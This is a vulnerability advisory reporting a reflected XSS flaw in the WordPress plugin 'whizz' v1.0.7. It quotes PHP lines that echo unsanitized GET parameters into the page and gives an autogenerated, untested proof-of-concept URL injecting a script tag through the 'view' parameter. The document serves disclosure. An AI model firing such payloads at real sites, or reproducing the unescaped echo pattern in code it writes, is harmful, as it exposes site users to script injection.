Advisory #: 110
Title: Reflected XSS in wordpress plugin whizz v1.0.7
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/whizz
Downloads: 448
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: whizz
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./whizz/users/user-list.php: 5: <form name="frm_delete_final" method="post" action="<?php echo WHIZZ_USERS_LIST_PLUGIN_URL; ?>&view=<?php echo $_GET['view']; ?>&deletec=yes&list_of=<?php echo $_GET['list_of']; ?>"> 170: <a href="<?php echo WHIZZ_USERS_LIST_PLUGIN_URL; ?>&view=list_view&list_of=<?php echo $_GET['list_of']; ?>"> The variable view appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./whizz/users/user-list.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/whizz/users/user-list.php?view="><script>alert(1);</script><"